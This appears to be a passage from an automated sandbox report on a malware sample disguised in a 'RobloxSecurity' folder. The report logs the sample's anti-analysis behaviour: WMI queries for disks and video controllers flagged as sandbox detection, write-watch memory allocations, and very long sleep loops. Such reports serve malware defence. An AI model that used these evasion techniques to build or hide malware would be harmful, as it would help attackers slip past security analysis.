Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Memory allocated: 2A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Memory allocated: 1F996210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Memory allocated: 1F9AFDF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1B8A9DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1B8C3950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 10DD58D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 10DEF3F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 17A71580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 17A73090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1EC01810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1EC199B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 167CFD40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 167E9760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1CF0AE90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Memory allocated: 1CF24830000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598469	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597665	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599655
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 599107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 598107
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597970
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597844
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 597077
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596953
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596625
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596297
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 582622
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Window / User API: threadDelayed 524	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6412	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2335	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 3339	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 6279	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 6523
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window / User API: threadDelayed 2597

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe TID: 1184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe TID: 7352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -599063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597665s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 2852	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452	Thread sleep count: 6523 > 30
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 4452	Thread sleep count: 2597 > 30
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599655s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599218s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -599107s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe TID: 7444	Thread sleep time: -598765s >= -30000s
